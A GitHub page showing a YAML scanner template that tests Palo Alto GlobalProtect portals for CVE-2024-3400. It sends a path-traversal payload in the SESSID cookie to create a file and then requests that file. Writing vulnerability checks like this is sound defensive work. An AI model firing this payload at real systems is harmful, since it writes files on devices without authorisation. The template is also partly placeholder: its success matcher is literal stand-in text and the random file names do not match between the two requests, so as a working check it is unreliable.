-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2024-3400_palo.yaml
47 lines (41 loc) · 1.34 KB
/
cve-2024-3400_palo.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
id: CVE-2024-3400
info:
name: Test for CVE-2024-3400 - Palo Alto
author: Jorge Caballero - CYBERTEMPLAR
severity: high
description: Prueba para determinar si un portal es vulnerable a CVE-2024-3400.
reference:
- "https://example.com/vulnerability-info"
tags: ["cve", "cve-2024-3400", "security"]
requests:
- raw:
- |
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randomString 10}}.txt;
Connection: close
test_data=test
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "specific error or success message indicating file creation"
part: body
- raw:
- |
GET /global-protect/portal/images/{{randomString 10}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Connection: close
matchers:
- type: status
status:
- 403
- type: status
status:
- 404